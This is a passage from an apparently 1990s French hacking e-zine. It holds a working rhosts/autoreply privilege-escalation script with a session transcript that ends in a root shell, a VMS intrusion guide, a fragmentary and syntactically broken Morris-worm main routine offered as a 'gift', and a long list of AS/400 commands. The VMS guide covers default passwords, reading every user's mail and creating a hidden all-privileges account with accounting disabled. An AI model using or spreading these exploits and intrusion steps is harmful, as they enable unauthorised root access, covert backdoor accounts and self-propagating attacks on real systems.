# fixrhosts rhosts-file user machine
#
if [ $# -ne 3 ]; then
echo "Usage: `basename $0` rhosts-file user machine"
exit 1
fi
RHOSTS="$1"
USERNAME="$2"
MACHINE="$3"
cd $HOME
echo x > "a
$MACHINE $USERNAME
b"

umask 022
autoreply "a
$MACHINE $USERNAME
b"

cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
EOF
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
rm -f /tmp/.rhosts.sh.$$ "a
$MACHINE $USERNAME
b"

exit 0

Ensuite :

> % id
uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % ./fixrhosts ~root/.rhosts 8lgm localhost
You've been added to the autoreply system.
You've been removed from the autoreply table.
> % rsh localhost -l root csh -i
Warning: no access to tty.
Thus no job control in this shell.
#

Voilà, de nombreuses versions sont maintenant patchées mais on en trouve encore sur
lesquelles çà marche.


+++Ultrason+++

-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------

IX] Petit rappel sur les VAX

Quand vous vous connectez sur un VAX (système VMS) vous allez vous retrouver devant le
prompt suivant :

USERNAME:
PASSWORD:

Bien que cela marche raremement (ca ne m'est arrivé qu'une seule fois), vous pouvez
essayer de vous connecter avec les accounts par défaut :

USERNAME PASSWORD

SYSTEM MANAGER ou OPERATOR
FIELD SERVICE ou TEST
DEFAULT USER ou DEFAULT
SYSTEST UETP ou SYSTEST

Les accounts suivants sont souvent utilisés sur les systèmes VMS :
VAX
VMS
DCL
DEMO
GUEST
GENERAL
TEST
HELP
GAMES
DECNET

Bref, si vous arrivez à pénétrer le VAX voici quelques commandes qui peuvent vous être
utiles :

Pour gagner les privilèges :
$ SET PROCESS/PRIVS=ALL

Si vous tapez la commande suivante, vous aurez une liste et des infos sur toutes les
commandes : $ help *

$ SHOW USERS : la commande parle d'elle même....
ex :

VAX/VMS Interactive Users-Total=4
01-may-1989 11:37:21.73
0PAO: DEMO 004C004C
TTD2: FIELD 004E02FF
TTD1: SYSMAN 0043552E
TXB3 TRTRTRRTR 01190057

Pour communiquer avec d'autres utilisateurs ou d'autre hackers sur le système ;) :
$ PHONE Username

$ SHOW NETWORK \
Ne soyons pas stupides....
$ MAIL /



$ DIR : comme sous dos.

Quand le système VMS est installé pour la première fois il y a 9 répertoires qui ne sont
pas listés si vous tapez dir *.*
Ce sont les répertoires suivants :

<SYSLIB>
Contient diverses macros et librairies.

<SYSMSG>
Contient les fichiers utilisés pour l'administration du système.

<SYSMGR>
Fichiers textes et fichiers d'aide.

<SYSERR>
Le fichier log des erreurs système : ERRLOG.SYS

<SYSTEST>
Contient des fichiers utilisés pour tester les fonction du système.

<SYSMAINT>
Contient les programmes de diagnostic du système.

<SYSUPD>
Contient les fichiers utilisés pour les mises à jour.

<SYSUPD.EXAMPLES>
Divers programmes...

<SYSEXE>
Contient les images des exécutables de la pluspart es fonctions du système.
This directory contains the executable images of most of the functions


Type de fichiers: Description: command:
------------------------------------------------------------------------------------------
.hlp system help file TYPE filename
.dat data file TYPE filename
.msg message file TYPE filename
.doc Documentation TYPE filename
.log LOG file TYPE filename
.err ERROR msg file TYPE filename
.seq sequential file TYPE filename
.sys system file FILE-NAME
.exe executable file FILE-NAME
.com command file COMMAND NAME
.bas basic file RUN file-name
.txt ascii text file TYPE filename
------------------------------------------------------------------------------------------

Si vous voulez voir tous les mails de tout le monde :
$TYPE <*.*>*.MAI;*

PRIVILEGES
Il y a 7 types de privilèges classés par ordre croissant :

NONE - No privileges

NORMAL - minimum privileges to use the system.

GROUP - Potential to interfere with members of the same group.

DEVOUR - Potential to devour noncritical system-wide resources.

SYSTEM - Potential to interfere with normal system operation.

FILE - Potential to comprimise file security.

ALL - Potential to control the system (wouldn't that be good ahah).


THE UAF

Le fichier uaf contient les noms de tous les utilisateurs ayant accès au système ainsi que
d'autres informations comme le password le code UIC, les privilèges etc...
Si vous avez les privilèges du system manager vous pouvez à loisir modifier, effacer,
rajouter, tout ce que vous voulez au fichier.

C'est l'utilitaire AUTHORIZE qui se trouve normalement dans le répertoire SYSEXE qui vous
permet de modifier ce fichier. Les commandes sont les suivantes:

ADD Username <qualifier..> Adds a record to the UAF.
EXIT (or CTRL-Z) Returns you to command level.
HELP Lists the AUTHORIZE commands.
LIST <Userspec></FULL> Creates a listing file of UAF records.
MODIFY Username Modifies a record.
REMOVE Username deletes a record.
SHOW Displays UAF records.

Petite précaution d'abord :
$ SET LOGINS /INTERACTIVE=0

Pour avoir une sortie du userfile :

$ SET DEFAULT <SYSEXE>
$ RUN AUTHORIZE
UAF> SHOW * /BRIEF

UAF
La méthode d'encryption des passwords est la même que sous unix.
Pour créer votre account :

UAF> ADD <Username> /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0
/DEVICE=SYS$ROOT_/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL
/OWNER=DIGITAL /NOACCOUNTING

1. ADD USERNAME
2. SPECIFY THE PASSWORD YOU WANT TO USE....
3. ASSIGN A UIC CONSISTS OF 2 NUMBERS FROM 0 TO 377 SEPERATED BY A
COMMAND ENCLOSED IN BRACKETS....
4. CPUTIME IS IN DELTA FORMAT, 0 MEANS INFINITE......
5. SPECIFY THE DEVICE THAT IS ALLOCATED TO THE USER WHEN THEY LOGIN.
OTHER DEVICES ARE SYS$DEVICE,SYS$SYSDISK ETC..
6. SPECIFYING AN ACCOUNT IS NOT REALLY NECCESSARY
7. PRIVS YOU ARE GOING TO WANT ALL THE PRIVS AREN'T YOU???
8. VERY IMPORTANT.... NOACCOUNTING WILL DISABLE THE SYSTEM ACCOUNTING
RECORDS,THUS NOT ADDING INFORMATION TO THE ACCOUNTING.DAT FILE.

LOGGING OFF
Simply type:
$ LOGOUT


+++Brain Override+++

------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------

X] Un petit cadeau


#include <sys/resource.h>



long current_time;

struct rlimit no_core = {0,0};



int

main (argc, argv)

int argc;

char *argv[];



{

int n;

int parent = 0;

int okay = 0;

/* change calling name to "sh" */

strcpy(argv[0], "sh");

/* prevent core files by setting limit to 0 */

setrlimit(RLIMIT_CORE, no_core);

current_time = time(0);

/* seed random number generator with time */

srand48(current_time);

n = 1;

while (argv[n]) {

/* save process id of parent */

if (!strncmp(argv[n], "-p", 2)) {

parent = atoi (argv[++n]);

n++;

}

else {

/* check for 1l.c in argument list */

if (!strncmp(argv([n], "1l.c", 4))

okay = 1;

/* load an object file into memory */

load_object (argv[n];

/* clean up by unlinking file */

if (parent)

unlink (argv[n]);

/* and removing object file name */

strcpy (argv[n++], "");

}



}

/* if 1l.c was not in argument list, quit */

if (!okay)

exit (0);

/* reset process group */

setpgrp (getpid());

/* kill parent shell if parent is set */

if (parent)

kill(parent, SIGHUP);

/* scan for network interfaces */

if_init();

/* collect list of gateways from netstat */

rt_init();

/* start main loop */

doit();

}



int

doit()

{

current_time = time (0);

/* seed random number generator (again) */

srand48(current_time);

/* attack gateways, local nets, remote nets */

attack_hosts();

/* check for a "listening" worm */

check_other ()

/* attempt to send byte to "ernie" */

send_message ()

for (;;) {

/* crack some passwords */

crack_some ();

/* sleep or listen for other worms */

other_sleep (30);

crack_some ();

/* switch process id's */

if (fork())

/* parent exits, new worm continues */

exit (0);

/* attack gateways, known hosts */

attack_hosts();

other_sleep(120);

/* if 12 hours have passed, reset hosts */

if(time (0) == current_time + (3600*12)) {

reset_hosts();

current_time = time(0); }

/* quit if pleasequit is set, and nextw>10 */

if (pleasequit && nextw > 10)

exit (0);

}

}

Eh...oui, il s'agit bien d'un WORM...


+++Brain Override+++

------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------


XI] Liste des commandes de l'IBM AS/400

Commandes Description
------- -----------
ADDACC Add Access Code
ADDAJE Add Autostart Job Entry
ADDAUTLE Add Authorization List Entry
ADDBKP Add Breakpoint
ADDCFGLE Add Configuration List Entries
ADDCMNE Add Communications Entry
ADDDIRE Add Directory Entry
ADDDLOAUT Add DLO Authority
ADDDSTLE Add Distribution List Entry
ADDDTADFN Add Data Definition
ADDICFDEVE Add ICF Device Entry
ADDJOBQE Add Job Queue Entry
ADDLFM Add Logical File Member
ADDLIBLE Add Library List Entry
ADDMSGD Add Message Description
ADDNETJOBE Add Network Job Entry
ADDPFM Add Physical File Member
ADDPFVLM Add Phy File Variable Len Mbr
ADDPGM Add Program
ADDRPYLE Add Reply List Entry
ADDRTGE Add Routing Entry
ADDTRC Add Trace
ADDWSE Add Work Station Entry
ALCOBJ Allocate Object
ANSLIN Answer Line
ANSQST Answer Questions
ANZACCGRP Analyze Process Access Group
ANZDBF Analyze Database Files
ANZDBFKEY Analyze Database File Keys
ANZPGM Analyze Programs
ANZPRB Analyze Problem
ANZS34OCL Analyze S/34 OCL
APYJRNCHG Apply Journaled Changes
APYPTF Apply Program Temporary Fix
ASKQST Ask Question
BCHJOB Batch Job
CALL Call Program
CFGDSTSRV Configure Distribution Service
CHGACGCDE Change Accounting Code
CHGAJE Change Autostart Job Entry
CHGAUTLE Change Authorization List Entr
CHGCFGL Change Configuration List
CHGCMD Change Command
CHGCMDDFT Change Command Default
CHGCMNE Change Communications Entry
CHGCOSD Change Class-of-Service Desc
CHGCTLAPPC Change Ctl Desc (APPC)
CHGCTLASC Change Ctl Desc (Async)
CHGCTLBSC Change Ctl Desc (BSC)
CHGCTLFNC Change Ctl Desc (Finance)
CHGCTLHOST Change Ctl Desc (SNA Host)
CHGCTLLWS Change Ctl Desc (Local WS)
CHGCTLRWS Change Ctl Desc (Remote WS)
CHGCTLVWS Change Ctl Desc (Virtual WS)
CHGCURLIB Change Current Library
CHGDBG Change Debug
CHGDDMF Change DDM File
CHGDEVAPPC Change Device Desc (APPC)
CHGDEVASC Change Device Desc (Async)
CHGDEVBSC Change Device Desc (BSC)
CHGDEVDKT Change Device Desc (Diskette)
CHGDEVDSP Change Device Desc (Display)
CHGDEVFNC Change Device Desc (Finance)
CHGDEVHOST Change Device Desc (SNA Host)
CHGDEVPRT Change Device Desc (Printer)
CHGDEVSNUF Change Device Desc (SNUF)
CHGDEVTAP Change Device Desc (Tape)
CHGDIRE Change Directory Entry
CHGDKTF Change Diskette File
CHGDLOAUT Change DLO Authority
CHGDLOOWN Change DLO Owner
CHGDOCD Change Document Description
CHGDSPF Change Display File
CHGDSTPWD Change DST Password
CHGDTA Change Data
CHGDTAARA Change Data Area
CHGGRPA Change Group Attributes
CHGHLLPTR Change HLL Pointer
CHGICFDEVE Change ICF Device Entry
CHGICFF Change ICF File
CHGJOB Change Job
CHGJOBD Change Job Description
CHGJOBQE Change Job Queue Entry
CHGJOBTYP Change Job Type
CHGJRN Change Journal
CHGKBDMAP Change Keyboard Map
CHGLF Change Logical File
CHGLFM Change Logical File Member
CHGLIB Change Library
CHGLIBL Change Library List
CHGLINASC Change Line Desc (Async)
CHGLINBSC Change Line Desc (BSC)
CHGLINSDLC Change Line Desc (SDLC)
CHGLINTDLC Change Line Desc (TDLC)
CHGLINTRN Change Line Desc (Token-Ring)
CHGLINX25 Change Line Desc (X.25)
CHGMNU Change Menu
CHGMODD Change Mode Description
CHGMSGD Change Message Description
CHGMSGQ Change Message Queue
CHGNETA Change Network Attributes
CHGNETJOBE Change Network Job Entry
CHGOBJD Change Object Description
CHGOBJOWN Change Object Owner
CHGOUTQ Change Output Queue
CHGPCOPRF Change PC Organizer Profile
CHGPF Change Physical File
CHGPFM Change Physical File Member
CHGPGM Change Program
CHGPGMVAR Change Program Variable
CHGPRF Change Profile
CHGPRTF Change Printer File
CHGPTR Change Pointer
CHGPWD Change Password
CHGQSTDB Change Q/A Database
CHGRPYLE Change Reply List Entry
CHGRTGE Change Routing Entry
CHGSAVF Change Save File
CHGSBSD Change Subsystem Description
CHGSPLFA Change Spooled File Attributes
CHGSRCPF Change Source Physical File
CHGSSNMAX Change Session Maximum
CHGSYSLIBL Change System Library List
CHGSYSVAL Change System Value
CHGS34LIBM Change S/34 Library Member
CHGS36 Change S/36 Configuration
CHGS36PGMA Change S/36 Program Attributes
CHGS36PRCA Change S/36 Proc Attributes
CHGS36PRCX Change S/36 Proc Attributes
CHGS36SRCA Change S/36 Source Attributes
CHGTAPF Change Tape File
CHGUSRPRF Change User Profile
CHGVAR Change Variable
CHGWSE Change Work Station Entry
CHGWTR Change Writer
CHKDKT Check Diskette
CHKDOC Check Document
CHKOBJ Check Object
CHKPWD Check Password
CHKRCDLCK Check Record Locks
CHKTAP Check Tape
CLCSTGCFG Calculate Storage Config
CLOF Close File
CLRDKT Clear Diskette
CLRJOBQ Clear Job Queue
CLRLIB Clear Library
CLRMSGQ Clear Message Queue
CLROUTQ Clear Output Queue
CLRPFM Clear Physical File Member
CLRSAVF Clear Save File
CLRTRCDTA Clear Trace Data
CMD Command Definition
CMPJRNIMG Compare Journal Images
COMMIT Commit
CPYCFGL Copy Configuration List
CPYDOC Copy Document
CPYF Copy File
CPYFRMDKT Copy From Diskette
CPYFRMPCD Copy From PC Document
CPYFRMTAP Copy From Tape
CPYLIB Copy Library
CPYPTF Copy Program Temporary Fix
CPYSPLF Copy Spooled File
CPYSRCF Copy Source File
CPYTODKT Copy To Diskette
CPYTOPCD Copy To PC Document
CPYTOTAP Copy To Tape
CRTAPAR Create APAR
CRTAUTHLR Create Authority Holder
CRTAUTL Create Authorization List
CRTBASPGM Create BASIC Program
CRTCBLPGM Create COBOL Program
CRTCFGL Create Configuration List
CRTCLPGM Create CL Program
CRTCLS Create Class
CRTCMD Create Command
CRTCOSD Create Class-of-Service Desc
CRTCTLAPPC Create Ctl Desc (APPC)
CRTCTLASC Create Ctl Desc (Async)
CRTCTLBSC Create Ctl Desc (BSC)
CRTCTLFNC Create Ctl Desc (Finance)
CRTCTLHOST Create Ctl Desc (SNA Host)
CRTCTLLWS Create Ctl Desc (Local WS)
CRTCTLRWS Create Ctl Desc (Remote WS)
CRTCTLVWS Create Ctl Desc (Virtual WS)
CRTDDMF Create DDM File
CRTDEVAPPC Create Device Desc (APPC)
CRTDEVASC Create Device Desc (Async)
CRTDEVBSC Create Device Desc (BSC)
CRTDEVDKT Create Device Desc (Diskette)
CRTDEVDSP Create Device Desc (Display)
CRTDEVFNC Create Device Desc (Finance)
CRTDEVHOST Create Device Desc (SNA Host)
CRTDEVPRT Create Device Desc (Printer)
CRTDEVSNUF Create Device Desc (SNUF)
CRTDEVTAP Create Device Desc (Tape)
CRTDKTF Create Diskette File
CRTDOC Create Document
CRTDSPF Create Display File
CRTDSTL Create Distribution List
CRTDTAARA Create Data Area
CRTDTADCT Create Data Dictionary
CRTDTAQ Create Data Queue
CRTDUPOBJ Create Duplicate Object
CRTEDTD Create Edit Description
CRTFLR Create Folder
CRTGSS Create Graphics Symbol Set
CRTICFF Create ICF File
CRTJOBD Create Job Description
CRTJOBQ Create Job Queue
CRTJRN Create Journal
CRTJRNRCV Create Journal Receiver
CRTLF Create Logical File
CRTLIB Create Library
CRTLINASC Create Line Desc (Async)
CRTLINBSC Create Line Desc (BSC)
CRTLINSDLC Create Line Desc (SDLC)
CRTLINTDLC Create Line Desc (TDLC)
CRTLINTRN Create Line Desc (Token-Ring)
CRTLINX25 Create Line Desc (X.25)
CRTMNU Create Menu
CRTMODD Create Mode Description
CRTMSGF Create Message File
CRTMSGFMNU Create Menu from Msg Files
CRTMSGQ Create Message Queue
CRTOUTQ Create Output Queue
CRTPF Create Physical File
CRTPLIPGM Create PL/I Program
CRTPRTF Create Printer File
CRTQSTDB Create Q/A Database
CRTQSTLOD Create Q/A Database Load
CRTRPGPGM Create RPG III Program
CRTRPTPGM Create Auto Report RPG Program
CRTSAVF Create Save File
CRTSBSD Create Subsystem Description
CRTSPADCT Create Spelling Aid Dictionary
CRTSRCPF Create Source Physical File
CRTS36CBL Create S/36 COBOL Program
CRTS36DSPF Create S/36 Display File
CRTS36MNU Create S/36 Menu
CRTS36MSGF Create S/36 Message File
CRTS36RPG Create RPG II Program
CRTS36RPGR Create Console Display File
CRTS36RPT Create S/36 RPG II Auto Report
CRTTAPF Create Tape File
CRTTBL Create Table
CRTUSRPRF Create User Profile
CVTBASSTR Convert S/36 Stream File
CVTBASUNF Convert S/36 Unformatted File
CVTBGUDTA Convert BGU Data
CVTCLSRC Convert CL Source
CVTDAT Convert Date
CVTS36CFG Convert S/36 Configuration
CVTS36FCT Convert Forms Control Table
CVTS36JOB Convert S/36 Migration Job
CVTS36QRY Convert S/36 Query
CVTS38JOB Convert S/38 Migration Job
CVTTOFLR Convert To Folder
DATA Data
DCL Declare CL Variable
DCLF Declare File
DEP Dependent Definition
DLCOBJ Deallocate Object
DLTAUTHLR Delete Authority Holder
DLTAUTL Delete Authorization List
DLTCFGL Delete Configuration List
DLTCHTFMT Delete Chart Format
DLTCLS Delete Class
DLTCMD Delete Command
DLTCOSD Delete Class-of-Service Desc
DLTCTLD Delete Controller Description
DLTDEVD Delete Device Description
DLTDFUPGM Delete DFU Program
DLTDKTLBL Delete Diskette Label
DLTDLO Delete Document Library Object
DLTDOCL Delete Document List
DLTDST Delete Distribution
DLTDSTL Delete Distribution List
DLTDTAARA Delete Data Area
DLTDTADCT Delete Data Dictionary
DLTDTAQ Delete Data Queue
DLTEDTD Delete Edit Description
DLTF Delete File
DLTGSS Delete Graphic Symbol Set
DLTJOBD Delete Job Description
DLTJOBQ Delete Job Queue
DLTJRN Delete Journal
DLTJRNRCV Delete Journal Receiver
DLTLIB Delete Library
DLTLICPGM Delete Licensed Program
DLTLIND Delete Line Description
DLTMNU Delete Menu
DLTMODD Delete Mode Description
DLTMSGF Delete Message File
DLTMSGQ Delete Message Queue
DLTNETF Delete Network File
DLTOUTQ Delete Output Queue
DLTOVR Delete Override
DLTOVRDEVE Delete Override Pgm Dev Entry
DLTPGM Delete Program
DLTPNLGRP Delete Panel Group
DLTPRB Delete Problem
DLTQRY Delete Query
DLTQST Delete Questions and Answers
DLTQSTDB Delete Q/A Database
DLTSBSD Delete Subsystem Description
DLTSCHIDX Delete Search Index
DLTSPADCT Delete Spelling Aid Dictionary
DLTSPLF Delete Spooled File
DLTTBL Delete Table
DLTUSRPRF Delete User Profile
DLYJOB Delay Job
DMPCLPGM Dump CL Program
DMPJOB Dump Job
DMPJOBINT Dump Job Internal
DMPOBJ Dump Object
DMPSYSOBJ Dump System Object
DMPTAP Dump Tape
DMPTRC Dump Trace
DO Do Group
DSPACC Display Access Code
DSPACCAUT Display Access Code Authority
DSPACCGRP Display Access Group
DSPAPPNINF Display APPN Information
DSPAUTHLR Display Authority Holder
DSPAUTL Display Authorization List
DSPAUTLDLO Display Authorization List DLO
DSPAUTLOBJ Display Authorization List Obj
DSPAUTUSR Display Authorized Users
DSPBKP Display Breakpoints
DSPCFGL Display Configuration List
DSPCHT Display Chart
DSPCLS Display Class
DSPCMD Display Command
DSPCOSD Display Class-of-Service Desc
DSPCTLD Display Controller Description
DSPDBG Display Debug
DSPDBR Display Data Base Relations
DSPDDMF Display DDM File
DSPDEVD Display Device Description
DSPDIR Display Directory
DSPDKT Display Diskette
DSPDLOAUT Display DLO Authority
DSPDOC Display Document
DSPDSTL Display Distribution List
DSPDSTLOG Display Distribution Log
DSPDSTSRV Display Distribution Services
DSPDTA Display Data
DSPDTAARA Display Data Area
DSPDTADCT Display Data Dictionary
DSPEDTD Display Edit Description
DSPFD Display File Description
DSPFFD Display File Field Description
DSPFLR Display Folder
DSPGDF Display Graphics Data File
DSPHLPDOC Display Help Document
DSPJOB Display Job
DSPJOBD Display Job Description
DSPJOBLOG Display Job Log
DSPJRN Display Journal
DSPJRNRCVA Display Journal Receiver Atr
DSPKBDMAP Display Keyboard Map
DSPLIB Display Library
DSPLIBL Display Library List
DSPLIND Display Line Description
DSPLOG Display Log
DSPMNUA Display Menu Attributes
DSPMODD Display Mode Description
DSPMODSTS Display Mode Status
DSPMSG Display Messages
DSPMSGD Display Message Description
DSPNETA Display Network Attributes
DSPOBJAUT Display Object Authority
DSPOBJD Display Object Description
DSPOVR Display Override
DSPPFM Display Physical File Member
DSPPGM Display Program
DSPPGMADP Display Program Adopt
DSPPGMREF Display Program References
DSPPGMVAR Display Program Variable
DSPPTF Display Program Temporary Fix
DSPRCDLCK Display Record Locks
DSPSAVF Display Save File
DSPSBSD Display Subsystem Description
DSPSOCSTS Display Sphere of Control

  
Sts
DSPSPLF Display Spooled File
DSPSRVSTS Display Service Status
DSPSYSVAL Display System Value
DSPS36 Display S/36 Configuration
DSPTAP Display Tape
DSPTRC Display Trace
DSPTRCDTA Display Trace Data
DSPUSRPMN Display User Permission
DSPUSRPRF Display User Profile
DUPDKT Duplicate Diskette
EDTAUTL Edit Authorization List
EDTDLOAUT Edit DLO Authority
EDTDOC Edit Document
EDTLIBL Edit Library List
EDTOBJAUT Edit Object Authority
EDTQST Edit Questions and Answers
EDTS36PGMA Edit S/36 Program Attributes
EDTS36PRCA Edit S/36 Procedure Attributes
EDTS36SRCA Edit S/36 Source Attributes
EJTEMLOUT Eject Emulation Output
ELEM Element Definition
ELSE Else
EMLPRTKEY Emulate Printer Keys
ENDBCHJOB End Batch Job
ENDCBLDBG End COBOL Debug
ENDCMTCTL End Commitment Control
ENDCPYSCN End Copy Screen
ENDCTLRCY End Controller Recovery
ENDDBG End Debug Mode
ENDDEVRCY End Device Recovery
ENDDO End Do Group
ENDGRPJOB End Group Job
ENDINP End Input
ENDJOB End Job
ENDJOBABN End Job Abnormal
ENDJOBTRC End Job Trace
ENDJRNAP End Journal Access Path
ENDJRNPF End Journaling PF Changes
ENDLINRCY End Line Recovery
ENDMOD End Mode
ENDPASTHR End Pass-Through
ENDPFRMON End Performance Monitor
ENDPGM End Program
ENDPRTEML End Printer Emulation
ENDRCV End Receive
ENDRDR End Reader
ENDRQS End Request
ENDSAM End Sampled Address Monitor
ENDSAMCOL End SAM Data Collection
ENDSBS End Subsystem
ENDSRVJOB End Service Job
ENDSYS End System
ENDS36 End S/36 Session
ENDTIESSN End TIE Session
ENDWTR End Writer
EXTPGMINF Extract Program Information
FILDOC File Document
FMTDTA Reformat Data
GENS36RPT Generate Migration Reports
GENS38RPT Generate Migration Reports
GO Go to Menu
GOTO Go To
GRTACCAUT Grant Access Code Authority
GRTOBJAUT Grant Object Authority
GRTUSRAUT Grant User Authority
GRTUSRPMN Grant User Permission
HLDCMNDEV Hold Communications Device
HLDJOB Hold Job
HLDJOBQ Hold Job Queue
HLDOUTQ Hold Output Queue
HLDRDR Hold Reader
HLDSPLF Hold Spooled File
HLDWTR Hold Writer
IF If
INZDKT Initialize Diskette
INZPCS Initialize AS/400 PC Support
INZPFM Initialize Physical File Mbr
INZTAP Initialize Tape
LNKDTADFN Link/Unlink Data Definition
LODPTF Load Program Temporary Fix
LODQSTDB Load Q/A Database
MDLSYS Model System
MGRS36ITM Migrate item
MGRS38OBJ Migrate object
MONMSG Monitor Message
MOVOBJ Move Object
MRGDOC Merge Document
MRGFORMD Merge Form Description
MRGMSGF Merge Message File
OPNDBF Open Data Base File
OPNQRYF Open Query File
OVRDBF Override with Data Base File
OVRDKTF Override with Diskette File
OVRDSPF Override with Display File
OVRICFDEVE Override ICF Pgm Device Entry
OVRICFF Override ICF File
OVRMSGF Override Message File
OVRPRTF Override with Printer File
OVRSAVF Override with Save File
OVRTAPF Override with Tape File
PAGDOC Paginate Document
PARM Parameter Definition
PGM Program
PMTCTL Prompt Control Definition
POSDBF Position Data Base File
PRTCMDUSG Print Command Usage
PRTCPTRPT Print Component Report
PRTDOC Print Document
PRTERRLOG Print Error Log
PRTINTDTA Print Internal Data
PRTJOBTRC Print Job Trace
PRTLCKRPT Print Lock Report
PRTSAMDTA Print SAM Data
PRTSYSRPT Print System Report
PRTTNSRPT Print Transaction Report
PWRDWNSYS Power Down System
QRYDOCLIB Query Document Library
QRYDST Query Distributions
QRYTIEF Query TIE Files
QUAL Qualifier Definition
RCLDDMCNV Reclaim DDM Conversations
RCLDLO Reclaim Document Lib Object
RCLRSC Reclaim Resources
RCLSTG Reclaim Storage
RCVDST Receive Distribution
RCVF Receive File
RCVJRNE Receive Journal Entry
RCVMSG Receive Message
RCVNETF Receive Network File
RCVTIEF Receive TIE File
RETURN Return
RGZPFM Reorganize Physical File Mbr
RLSCMNDEV Release Communications Device
RLSJOB Release Job
RLSJOBQ Release Job Queue
RLSOUTQ Release Output Queue
RLSRDR Release Reader
RLSSPLF Release Spooled File
RLSWTR Release Writer
RMVACC Remove Access Code
RMVAJE Remove Autostart Job Entry
RMVAUTLE Remove Auth List Entry
RMVBKP Remove Breakpoint
RMVCFGLE Remove Cfg List Entries
RMVCMNE Remove Communications Entry
RMVDIRE Remove Directory Entry
RMVDLOAUT Remove DLO Authority
RMVDSTLE Remove Distribution List Entry
RMVICFDEVE Remove ICF Device Entry
RMVJOBQE Remove Job Queue Entry
RMVJRNCHG Remove Journaled Changes
RMVLIBLE Remove Library List Entry
RMVM Remove Member
RMVMSG Remove Message
RMVMSGD Remove Message Description
RMVNETJOBE Remove Network Job Entry
RMVPGM Remove Program
RMVPTF Remove Program Temporary Fix
RMVRPYLE Remove Reply List Entry
RMVRTGE Remove Routing Entry
RMVTRC Remove Trace
RMVWSE Remove Work Station Entry
RNMDKT Rename Diskette
RNMDLO Rename Document Library Object
RNMM Rename Member
RNMOBJ Rename Object
ROLLBACK Rollback
RPLDOC Replace Document
RRTJOB Reroute Job
RSMBKP Resume Breakpoint
RSMCTLRCY Resume Controller Recovery
RSMDEVRCY Resume Device Recovery
RSMLINRCY Resume Line Recovery
RSTAUT Restore Authority
RSTCFG Restore Configuration
RSTDLO Restore Document Lib Object
RSTLIB Restore Library
RSTLIBS RESTORE/CLEAR 1 TO 10 LIBRARIES
RSTLIBSBOS Restore/Clear 1 to 20 libraries
RSTLICPGM Restore Licensed Program
RSTOBJ Restore Object
RSTS36F Restore S/36 File
RSTS36FLR Restore S/36 Folder
RSTS36LIBM Restore S/36 Library Members
RSTUSRPRF Restore User Profiles
RTVAUTLE Retrieve Auth List Entry
RTVCLSRC Retrieve CL Source
RTVDOC Retrieve Document
RTVDTAARA Retrieve Data Area
RTVGRPA Retrieve Group Attributes
RTVJOBA Retrieve Job Attributes
RTVJRNE Retrieve Journal Entry
RTVMSG Retrieve Message
RTVNETA Retrieve Network Attributes
RTVSYSVAL Retrieve System Value
RTVUSRPRF Retrieve User Profile
RUNQRY Run Query
RVKACCAUT Revoke Access Code Authority
RVKOBJAUT Revoke Object Authority
RVKUSRPMN Revoke User Permission
SAVCHGOBJ Save Changed Objects
SAVDLO Save Document Library Object
SAVLIB Save Library
SAVLICPGM Save Licensed Program
SAVOBJ Save Object
SAVSAVFDTA Save Save File Data
SAVSYS Save System
SAVS36F Save S/36 File
SAVS36LIBM Save S/36 Library Members
SBMDBJOB Submit Data Base Jobs
SBMDKTJOB Submit Diskette Jobs
SBMFNCJOB Submit Finance Job
SBMJOB Submit Job
SBMNETJOB Submit Network Job
SBMRMTCMD Submit Remote Command
SETATNPGM Set Attention Program
SETKBDMAP Set Keyboard Map
SETPGMINF Set Program Information
SIGNOFF Sign Off
SLTCMD Select Command
SNDBRKMSG Send Break Message
SNDDOC Send Document
SNDDST Send Distribution
SNDF Send File
SNDJRNE Send Journal Entry
SNDMSG Send Message
SNDNETF Send Network File
SNDNETMSG Send Network Message
SNDNETSPLF Send Network Spool File
SNDPGMMSG Send Program Message
SNDPTFORD Send PTF Order
SNDRCVF Send/Receive File
SNDRPY Send Reply
SNDSRVRQS Send Service Request
SNDTIEF Send TIE File
SNDUSRMSG Send User Message
STRAPF Advanced Printer Function
STRBAS Start BASIC Session
STRBASPRC Start BASIC Procedure
STRBGU Start BGU
STRCBLDBG Start COBOL Debug
STRCMTCTL Start Commitment Control
STRCPYSCN Start Copy Screen
STRDBG Start Debug
STRDBRDR Start Data Base Reader
STRDFU Start DFU
STRDKTRDR Start Diskette Reader
STRDKTWTR Start Diskette Writer
STREDU Start Education
STREML3270 Start 3270 Display Emulation
STRIDD Start IDD
STRIDXSCH Start Index Search
STRITF Start ITF
STRJOBTRC Start Job Trace
STRJRNAP Start Journal Access Path
STRJRNPF Start Journal Physical File
STRMOD Start Mode
STROFC Start Office
STRPASTHR Start Pass-Through
STRPCCMD Start PC Command
STRPCO Start PC Organizer
STRPDM Start PDM
STRPFRMON Start Performance Monitor
STRPFRT Start Performance Tools
STRPGMMNU Start Programmer Menu
STRPRTEML Start Printer Emulation
STRPRTWTR Start Printer Writer
STRQRY Start Query
STRQST Start Question and Answer
STRSAM Start Sampled Address Monitor
STRSAMCOL Start SAM Data Collection
STRSBS Start Subsystem
STRSDA Start SDA
STRSEU Start Source Entry Utility
STRSPTN Start Support Network
STRSRVJOB Start Service Job
STRSST Start System Service Tools
STRS36 Start S/36 Session
STRS36MGR Start S/36 Migration
STRS36PRC Start S/36 Procedure
STRS38MGR Start S/38 Migration
STRTIESSN Start TIE Session
STRWP Start Word Processing
TFRBCHJOB Transfer Batch Job
TFRCTL Transfer Control
TFRGRPJOB Transfer to Group Job
TFRJOB Transfer Job
TFRSECJOB Transfer Secondary Job
TRCINT Trace Internal
TRCJOB Trace Job
UPDDTA Update Data with Temp Program
VFYCMN Verify Communications
VFYPRT Verify Printer
VRYCFG Vary Configuration
WAIT Wait
WRKACTJOB Work with Active Jobs
WRKALR Work with Alerts
WRKAUTL Work with Authorization Lists
WRKCFGL Work with Configuration Lists
WRKCFGSTS Work with Configuration Status
WRKCMD Work with Commands
WRKCNTINF Work with Contact Information
WRKCOSD Work with COS Descriptions
WRKCTLD Work with Ctl Descriptions
WRKDBFIDD Work with DB Files using IDDU
WRKDDMF Work with DDM Files
WRKDEVD Work with Device Descriptions
